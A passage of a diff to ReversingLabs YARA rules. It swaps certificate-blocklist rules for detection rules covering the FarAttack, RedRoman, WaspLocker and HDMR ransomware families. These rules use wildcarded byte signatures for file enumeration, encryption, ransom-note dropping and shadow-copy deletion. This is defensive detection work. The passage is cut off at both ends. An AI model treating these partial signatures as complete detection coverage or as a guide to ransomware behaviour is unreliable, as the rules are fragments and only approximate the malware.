+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B
+            E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOLGA KAPLAN" and pe.signatures [ i ] . serial == "01:66:b6:50:38:d6:1e:54:35:b4:82:04:ca:e4:79:5a" and 1403999999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $delete_shadow_copies )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_784F226B45C3Bd8E4089243D747D1F59 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Farattack : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FarAttack ransomware."
 		author = "ReversingLabs"
-		id = "f2a979e0-2027-5143-8cb4-ffcfd19faf45"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7ee7121a-4ca2-513c-96dc-53b5c48d719f"
+		date = "2022-06-21"
+		modified = "2022-06-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2578-L2594"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "df8ca35a07ec6815d1efb68fa6fbf8f80c57032ecb99d0b038da0604ceffe8cf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.FarAttack.yara#L1-L93"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "af22b8110c2b545f083b443c7a1fa7e7639324e9188eefadfe1fe70ebb1bb7fb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FarAttack"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 59 6A ?? 58 E9 ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 03 C7 89
+            45 ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? F7 06 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4E ??
+            51 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? F6 06 ?? 74 ?? 8B 45 ?? 8D 04 45 ?? ?? ?? ?? 50 8D 46 ??
+            50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 8B 53 ??
+            8B 75 ?? 8B 01 53 89 44 72 ?? 66 8B 41 ?? 8B CE 66 89 44 4A ?? FF 43 ?? 83 63 ?? ??
+            E8 ?? ?? ?? ?? FF 4B ?? 83 63 ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 83 7B ?? ?? 75 ?? FF 73
+            ?? FF 73 ?? FF 73 ?? FF 73 ?? 57 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C7 43
+            ?? ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D
+            04 45 ?? ?? ?? ?? 50 8D 46 ?? 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 7E ?? ?? 75 ?? 83 7E ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 8B 45 ?? 8D 34 00
+            8D 4E ?? 51 E8 ?? ?? ?? ?? 56 89 07 FF 73 ?? 50 E8 ?? ?? ?? ?? 8B 07 33 C9 83 C4 ??
+            66 89 0C 06 8B 75 ?? 51 57 51 8B 46 ?? 89 47 ?? 8B 46 ?? 89 47 ?? 8B 45 ?? 89 47 ??
+            FF 73 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 4B ?? A1 ?? ?? ?? ?? 89 44 79 ?? 66 A1 ?? ??
+            ?? ?? 66 89 44 79 ?? 56 FF 75 ?? FF 15
+        }
+		$create_key = {
+            55 8B EC 56 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 32 C0 EB ?? A1 ?? ?? ?? ?? 53
+            33 DB 85 C0 74 ?? 53 6A ?? 53 53 56 FF D0 EB ?? 8A C3 84 C0 75 ?? FF 15 ?? ?? ?? ??
+            3D ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 53 53 56 FF D0 8A D8 84
+            DB 75 ?? 56 E8 ?? ?? ?? ?? 59 32 C0 EB ?? 8B 4D ?? B0 ?? 89 71 ?? 5B 5E 5D C3
+        }
+		$encrypt_files_p1 = {
+            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83
+            FF ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 8B 40
+            ?? 83 C1 ?? 03 C1 8B 5D ?? 89 5D ?? 8B 4D ?? 89 4D ?? 99 03 D8 89 5D ?? 13 CA 89 4D
+            ?? 8B 55 ?? 8B 45 ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ??
+            ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? ?? C7 45 ?? ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 59 89 4D ?? 51
+            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 4D ?? 6A ?? 53 51 6A ?? 6A ?? 57 FF 15 ??
+            ?? ?? ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 89 45 ?? 89 45 ?? 33 C9 8B C1 89 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? 89 45 ?? 89
+            45 ?? 89 4D ?? 8B 4D ?? FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50
+            FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 85 C0
+        }
+		$encrypt_files_p2 = {
+            75 ?? 89 55 ?? 21 45 ?? 8B CE 89 4D ?? 89 4D ?? EB ?? 8B 4D ?? 3B 4D ?? 0F 8D ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 85 C9 74 ?? 83 7D ?? ?? 74 ?? 8D 41 ?? 3B 45 ?? 74 ??
+            8B C1 99 FF 75 ?? FF 75 ?? 52 50 E8 ?? ?? ?? ?? 8B C8 89 45 ?? C7 45 ?? ?? ?? ?? ??
+            EB ?? 8B CA 81 E9 ?? ?? ?? ?? 89 4D ?? 8B 55 ?? 83 DA ?? 83 65 ?? ?? 89 55 ?? 6A ??
+            8B 45 ?? FF 70 ?? 52 51 E8 ?? ?? ?? ?? 6A ?? 8B 4D ?? FF 71 ?? 52 50 E8 ?? ?? ?? ??
+            8B C8 89 4D ?? 89 55 ?? 8B 45 ?? 2B C1 89 45 ?? 8B 4D ?? 1B CA 89 45 ?? 89 4D ?? EB
+            ?? 8B 55 ?? 8B C2 C1 F8 ?? FF 75 ?? FF 75 ?? 52 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 75 ?? 50 FF 75 ?? FF 75 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ??
+            ?? ?? 8B 75 ?? 8B 7D ?? 83 4D ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? C3 03 45 ?? 56 6A ?? 8D 4D ?? 51 50 FF 75 ?? 50 6A ?? 6A ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 45 ?? 40
+            89 45 ?? 3B 45 ?? 75 ?? 8B 75 ?? FF 76 ?? FF 76 ?? 8B 45 ?? 03 45 ?? 03 45 ?? 50 E8
+            ?? ?? ?? ?? FF 76 ?? FF 76 ?? 8B 46 ?? 03 45 ?? 03 45 ?? 03 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 7E ?? 03 7E ?? 03 7D ?? 03 7D ?? 8B 45 ?? 03 F8 8D 75 ?? A5 A5 A5 A5 6A
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 F6 46 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 4D
+            ?? 8B 55 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 8B 35 ?? ?? ?? ?? FF D6
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSPro Labs" and pe.signatures [ i ] . serial == "78:4f:22:6b:45:c3:bd:8e:40:89:24:3d:74:7d:1f:59" and 1242777599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $create_key ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_11690F05604445Fae0De539Eeeeec584 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Redroman : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RedRoman ransomware."
 		author = "ReversingLabs"
-		id = "e6513bd1-2524-5baa-8484-b7e0f2f0c02a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c860586a-fa50-5bb4-a3b4-13506f9d6030"
+		date = "2021-05-10"
+		modified = "2021-05-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2596-L2612"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b66257f562f698559910eb9576f8fdf0ce3a750cc0a96a27e2ec1a18872ad13f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.RedRoman.yara#L1-L82"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6fb2ac0e7f7ac095766e27c057e5124406dc493c08d01a7e5381403d794c7240"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RedRoman"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ??
+            ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 6B C9 ?? 48 89 84 0C ?? ?? ?? ?? 48 C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 83 BC 04 ??
+            ?? ?? ?? ?? 74 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? EB ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 01 48 8B 44 24 ?? 48 8B
+            40 ?? 48 83 38 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B
+            8C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8
+        }
+		$encrypt_files_p2 = {
+            4C 8D 05 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
+            55 ?? 48 89 45 ?? EB ?? 31 C0 41 89 C0 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
+            45 ?? EB ?? 48 8B 45 ?? 48 83 F8 ?? 74 ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? EB ?? EB ?? 48 81 C4 ?? ?? ?? ?? 5D C3 48 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 48 8B
+            85 ?? ?? ?? ?? 48 85 C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ??
+            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 85
+            C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 8D
+        }
+		$find_files = {
+            48 8D 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D9 31 D2 E8 ?? ?? ?? ?? 48 8B 0F 48
+            89 DA E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 8D B4 24 ?? ?? ?? ?? 48 8D 9C 24 ??
+            ?? ?? ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? EB ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0F 48
+            89 DA E8 ?? ?? ?? ?? 85 C0 74 ?? 66 83 BC 24 ?? ?? 00 00 ?? 75 ?? 0F B7 84 24 ?? ??
+            ?? ?? 66 85 C0 74 ?? 66 83 F8 ?? 75 ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? 48 8B 47 ??
+            F0 48 83 00 ?? 0F 8E ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? 48 8D 4E ?? 48 8D 94 24
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48
+            C7 06 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? C6 46 ?? ?? 89 46 ?? 48
+            89 F0 0F 28 B5 ?? ?? ?? ?? 0F 28 BD ?? ?? ?? ?? 44 0F 28 85 ?? ?? ?? ?? 44 0F 28 8D
+            ?? ?? ?? ?? 44 0F 28 95 ?? ?? ?? ?? 44 0F 28 9D ?? ?? ?? ?? 44 0F 28 A5 ?? ?? ?? ??
+            44 0F 28 AD ?? ?? ?? ?? 44 0F 28 B5 ?? ?? ?? ?? 44 0F 28 BD ?? ?? ?? ?? 48 8D A5 ??
+            ?? ?? ?? 5B 5F 5E 41 5E 5D C3 0F 0B
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tera information Technology co.Ltd" and pe.signatures [ i ] . serial == "11:69:0f:05:60:44:45:fa:e0:de:53:9e:ee:ee:c5:84" and 1294703999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Aa146Bff4B832Bdbfe30B84580356763 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wasplocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WaspLocker ransomware."
 		author = "ReversingLabs"
-		id = "90fab567-f39f-5d0b-b0d9-a93693a05a01"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "596bf965-700a-58f5-b0e5-61ec57c23a3e"
+		date = "2022-06-28"
+		modified = "2022-06-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2614-L2632"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "37abe7a4fd773fd34f5d7dbe725ba4edcfb8ebb501dc41f386b8b0629161051f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.WaspLocker.yara#L1-L76"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "852ec52328fca36d651e3176ac33a57ce26cefecadc2aad27235548e5b9813c1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WaspLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            50 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? 57 53 E8 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            A8 ?? 75 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 3B 85 ?? ?? ?? ?? 76 ?? 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 59 03 C2 B9 ?? ?? ?? ?? 3B C1
+            7D ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? EB ?? 85 DB 0F 84
+            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 85 FF 75 ?? 33 C0 EB ?? 57 E8 ?? ?? ?? ?? 59 50 57
+            8D 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 40 E8 ?? ?? ??
+            ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
+            F6 89 75 ?? 33 FF 89 7D ?? 21 75 ?? 21 75 ?? 39 3D ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B F0 89 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
+        }
+		$drop_aux_files = {
+            A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 66 89 41 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 56 6A ?? FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF 15
+            ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 85 F6 74 ?? 56 FF B5 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 6A ?? 56 FF 15 ?? ??
+            ?? ?? 50 89 85 ?? ?? ?? ?? E8
+        }
+		$drop_ransom_notes = {
+            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0
+            75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? B9 ?? ?? ?? ?? 8D
+            51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83
+            C0 ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            84 C0 75
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yancheng Peoples Information Technology Service Co., Ltd" and ( pe.signatures [ i ] . serial == "00:aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" or pe.signatures [ i ] . serial == "aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" ) and 1295481599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $drop_aux_files ) and ( $drop_ransom_notes )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_E86F46B60142092Aae81B8F6Fa3D9C7C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_HDMR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HDMR ransomware."
 		author = "ReversingLabs"
-		id = "fde17cc1-a968-5134-b12b-d65cb34c086f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "97b5020c-6cb1-5ec6-84a4-2f35eae761c2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2634-L2652"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
